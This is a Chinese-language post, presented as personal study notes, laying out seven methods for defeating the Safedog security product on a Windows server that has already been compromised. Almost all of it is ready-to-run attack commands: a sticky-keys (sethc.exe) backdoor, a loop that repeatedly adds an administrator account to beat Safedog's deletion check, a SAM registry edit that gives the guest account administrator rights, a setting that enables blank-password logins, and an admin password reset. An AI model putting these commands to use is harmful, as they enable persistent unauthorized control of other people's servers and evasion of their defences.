提权绕过安全狗加账户的种种思路。
注:个人学习总结心得。
提权时候拿到system权限后,安全狗就如同渣渣,不是么?
打狗棍法一:
system权限下直接执行K狗工具,k掉安全狗的防御,
打狗棍法二:
上传shift后门,(有可能被拦截)
直接复制
copy C:\sethc.exe C:\windows\system32\sethc.exe
copy C:\windows\system32\sethc.exe C:\windows\system32\dllcache\sethc.exe
或者注册表劫持,修改压缩包里面注册表里面文件的路径
打狗棍法三:
在net1没禁用的情况下,
安全狗的拦截加账户,是每两秒检测一次保护的用户组,检测到新添加的就会删除,我们可以利用的就是他这个两秒时间,
利用for循环来不断的加帐号,一直加,他一直删,我们能进入服务器,不是么?执行100次加账户的命令,
for /l %%i in (1,1,100) do @net user asphxg asphxg /add&@net localgroup administrators asphxg /add
打狗棍法四:
首先,用guest,演示一下,具体操作是通过注册表,篡改sam下用户的F值,使其达到管理权限.
首先,你必须有可以提权的exp,使自己达到system权限,大家都知道,administrator对应值是1F4,GUEST是1F5,如果有例外,下面会讲到。
下面是步骤:
1.使用net1 user guset 1 ,将guest密码重置为1,无需过问是guest否禁用
2.执行:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\RECYCLER\1.reg"
导出administrator的注册表值到某路径,修改内容,将"V"值删除,只留F值,将1F4修改为1F5,保存。
3.执行regedit /s C:\RECYCLER\1.reg 导入注册表
就可以使用,guest 密码 1登陆了。
安全狗说:在账户保护全开的情况下,如果不能更改密码呢?!
打狗棍法五:
如果真的不能更改密码呢?则使用vbs查看iis用户密码,再使用
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\names\用户名" "C:\2.reg"
查看其对应值,再重复以上第二步和第三步,使用查看到的明文密码登陆
安全狗又提示:
如果不允许修改密码,iis用户是禁止登陆远程桌面的呢?
打狗棍法六:
对啊,我们该怎么办?继续听我说,大家都知道guest是空密码,那我们就使用空密码登陆。
执行
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v limitblankpassworduse /t REG_DWORD /d 0 /f
修改limitblankpassworduse值为1,重复上面第二第三步骤,继续登陆。
打狗棍法七:
查询在线用户query user
直接修改管理员密码~
oh ye~
注:个人学习总结心得。
---------------------